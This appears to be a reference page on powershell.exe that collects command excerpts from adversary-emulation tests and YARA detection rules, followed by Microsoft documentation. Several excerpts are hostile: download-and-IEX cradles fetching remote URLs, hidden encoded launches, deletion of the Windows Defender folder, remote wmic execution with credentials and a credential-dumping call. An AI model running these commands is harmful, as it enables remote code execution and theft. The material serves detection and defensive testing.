atomic-red-team T1059.001.md powershell.exe -exec bypass -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(‘GET’,’#{url}’,$False);$comMsXml.Send();IEX $comMsXml.ResponseText” MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -exec bypass -noprofile “$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(‘#{url}’);$Xml.command.a.execute | IEX” MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe -version 2 -Command Write-Host $PSVersion MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -Command parameter MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -EncodedCommand parameter MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied MIT License. © 2018 Red Canary
atomic-red-team T1059.001.md powershell.exe -e #{obfuscated_code} MIT License. © 2018 Red Canary
atomic-red-team T1123.md powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Spawns a powershell.exe process as a child of the current process. MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md | file_path | File path or name of process to spawn | Path | $Env:windir\System32\WindowsPowerShell\v1.0\powershell.exe| MIT License. © 2018 Red Canary
atomic-red-team T1134.004.md Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. MIT License. © 2018 Red Canary
atomic-red-team T1218.005.md mshta.exe “about:'" MIT License. © 2018 Red Canary
atomic-red-team T1543.003.md sc config Fax binPath= “C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c "write-host ‘T1543.003 Test’"” MIT License. © 2018 Red Canary
atomic-red-team T1547.001.md | thing_to_execute | Thing to Run | Path | powershell.exe| MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md On Windows, there are a variety of features in scripting languages in Windows, such as PowerShell, Jscript, and Visual Basic to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden. (Citation: PowerShell About 2019) MIT License. © 2018 Red Canary
atomic-red-team T1564.003.md | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md Upon successful execution, cmd.exe creates a new service using sc.exe that will start powershell.exe to create a new file art-marker.txt MIT License. © 2018 Red Canary
atomic-red-team T1569.002.md | executable_command | Command to execute as a service | String | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| MIT License. © 2018 Red Canary
atomic-red-team T1574.001.md Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. MIT License. © 2018 Red Canary
atomic-red-team T1574.001.md copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe MIT License. © 2018 Red Canary
atomic-red-team T1588.002.md #{local_folder}#{local_executable} “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” /WindowState 0 /CommandLine “rmdir ‘C:\ProgramData\Microsoft\Windows Defender’ -Recurse” /StartDirectory “” /RunAs 8 /Run MIT License. © 2018 Red Canary
signature-base apt_apt34.yar $x3 = “powershell.exe -exec bypass -enc " + ${global:$http_ag} +” wide CC BY-NC 4.0
signature-base apt_fin7.yar $x3 = “\par \tab \tab \tab sh.Run "powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File " & pToPSCb, 0, False” fullword ascii CC BY-NC 4.0
signature-base apt_greenbug.yar $s1 = “powershell.exe -nologo -windowstyle hidden -c "Set-ExecutionPolicy -scope currentuser” fullword ascii CC BY-NC 4.0
signature-base apt_greenbug.yar $s2 = “powershell.exe -c "Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . "” fullword ascii CC BY-NC 4.0
signature-base apt_lazarus_dec17.yar $x1 = “$ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList” fullword ascii CC BY-NC 4.0
signature-base apt_lazarus_dec17.yar $x5 = “/tr "powershell.exe -ep bypass -windowstyle hidden -file “ ascii CC BY-NC 4.0
signature-base apt_magichound.yar $s1 = “powershell.exe “ fullword ascii CC BY-NC 4.0
signature-base apt_middle_east_talosreport.yar $x1 = “objWShell.Run "powershell.exe -ExecutionPolicy Bypass -File ""%appdata%""\sys.ps1", 0 “ fullword ascii CC BY-NC 4.0
signature-base apt_molerats_jul17.yar $x1 = “powershell.exe -nop -c "iex” nocase ascii CC BY-NC 4.0
signature-base apt_ncsc_report_04_2018.yar $ = “powershell.exe” ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x2 = “wss.Run "powershell.exe " & Chr(34) & "& {waitfor haha /T 2}" & Chr(34), 0” fullword ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x1 = “wss.Run "powershell.exe " & Chr(34) & "& {(Get-Content $env:Public\Libraries\update.vbs) -replace ‘__’,(Get-Random) | Set-C” ascii CC BY-NC 4.0
signature-base apt_oilrig.yar $x1 = “Powershell.exe -exec bypass -file ${global:$address1}” CC BY-NC 4.0
signature-base apt_unc2447_sombrat.yar $x1 = “powershell.exe -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::” ascii CC BY-NC 4.0
signature-base apt_unc2447_sombrat.yar $x2 = “wwansvc.txt’)))" | powershell.exe -“ ascii fullword CC BY-NC 4.0
signature-base apt_wilted_tulip.yar $x1 = “powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b=’powershell.exe’}else{$b=$env:windir+” ascii CC BY-NC 4.0
signature-base gen_empire.yar $s2 = “$PowershellExe=$env:windir+’\syswow64\WindowsPowerShell\v1.0\powershell.exe’” fullword ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $s1 = “powershell.exe -nop -w hidden -e” ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $x1 = “%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e” ascii CC BY-NC 4.0
signature-base gen_metasploit_payloads.yar $s1 = “.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then” fullword ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $p1 = “powershell.exe” fullword ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s4 = “powershell.exe -w hidden -ep bypass -Enc” ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s6 = “powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run” nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $s1 = “POwErSHELl.ExE” fullword ascii nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x1 = “Process.Create("powershell.exe -nop -w hidden” fullword ascii nocase CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x2 = “.Run"powershell.exe -nop -w hidden -c ""IEX “ ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x1 = “.Run "powershell.exe -nop -w hidden -e “ ascii CC BY-NC 4.0
signature-base gen_powershell_susp.yar $x2 = “FileExists(path + "\..\powershell.exe")” fullword ascii CC BY-NC 4.0
signature-base gen_ps_empire_eval.yar $s2 = “powershell.exe” ascii fullword CC BY-NC 4.0
signature-base gen_webshells.yar $exec_shell2 = “powershell.exe” nocase wide ascii CC BY-NC 4.0
signature-base gen_winpayloads.yar $x4 = “powershell.exe -WindowStyle Hidden -enc JABjAGwAaQBlAG4AdAA” ascii CC BY-NC 4.0
signature-base gen_win_privesc.yar $x1 = “# powershell.exe -executionpolicy bypass -file folderperm.ps1” fullword ascii CC BY-NC 4.0
signature-base gen_wmi_implant.yar $x5 = “-Command ‘powershell.exe -command "Enable-PSRemoting” fullword ascii CC BY-NC 4.0
signature-base thor-hacktools.yar $s1 = “[*] Looks like we’re 64bit, using regular powershell.exe” ascii wide CC BY-NC 4.0
stockpile 702bfdd2-9947-4eda-b551-c3a1ea9a59a2.yml powershell.exe -c "Get-WmiObject -class win32_operatingsystem \| select -property * \| export-csv msdebug.log"; Apache-2.0
stockpile e5f9de8f-3df1-4e78-ad92-a784e3f6770d.yml Copy-Item C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Temp\debug.exe; Apache-2.0
stockpile 315cedf1-4a3a-4015-b63f-149d64bacbbc.yml start powershell.exe -ArgumentList "-NoP","-StA","-ExecutionPolicy","bypass",".\Emulate-Administrator-Tasks.ps1" Apache-2.0
stockpile bfff9006-d1fb-46ce-b173-92cb04e9a031.yml powershell.exe -c IEX (New-Object Net.Webclient).downloadstring("https://bit.ly/33H0QXi") Apache-2.0
stockpile ece5dde3-d370-4c20-b213-a1f424aa8d03.yml wmic /node:”#{remote.host.fqdn}" /user:”#{domain.user.name}" /password:”#{domain.user.password}" process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}"; Apache-2.0
stockpile 110cea7a-5b03-4443-92ee-7ccefaead451.yml $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "$commandString"; Apache-2.0
stockpile 68235976-2404-42a8-9105-68230cfef562.yml powershell.exe -ep bypass -c "Invoke-MemeKatz.ps1" Apache-2.0

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


PowerShell

Windows PowerShell is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

Using PowerShell.exe

The PowerShell.exe command-line tool starts a Windows PowerShell session in a Command Prompt window. When you use PowerShell.exe, you can use its optional parameters to customize the session. For example, you can start a session that uses a particular execution policy or one that excludes a Windows PowerShell profile. Otherwise, the session is the same as any session that is started in the Windows PowerShell console.

  • To start a Windows PowerShell session in a Command Prompt window, type PowerShell. A PS prefix is added to the command prompt to indicate that you are in a Windows PowerShell session.

  • To start a session with a particular execution policy, use the ExecutionPolicy parameter, and type:

      PowerShell.exe -ExecutionPolicy Restricted
    
  • To start a Windows PowerShell session without your Windows PowerShell profiles, use the NoProfile parameter, and type:

      PowerShell.exe -NoProfile
    
  • To start a session , use the ExecutionPolicy parameter, and type:

      PowerShell.exe -ExecutionPolicy Restricted
    
  • To see the PowerShell.exe help file, type:

      PowerShell.exe -help
      PowerShell.exe -?
      PowerShell.exe /?
    
  • To end a Windows PowerShell session in a Command Prompt window, type exit. The typical command prompt returns.

Remarks

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.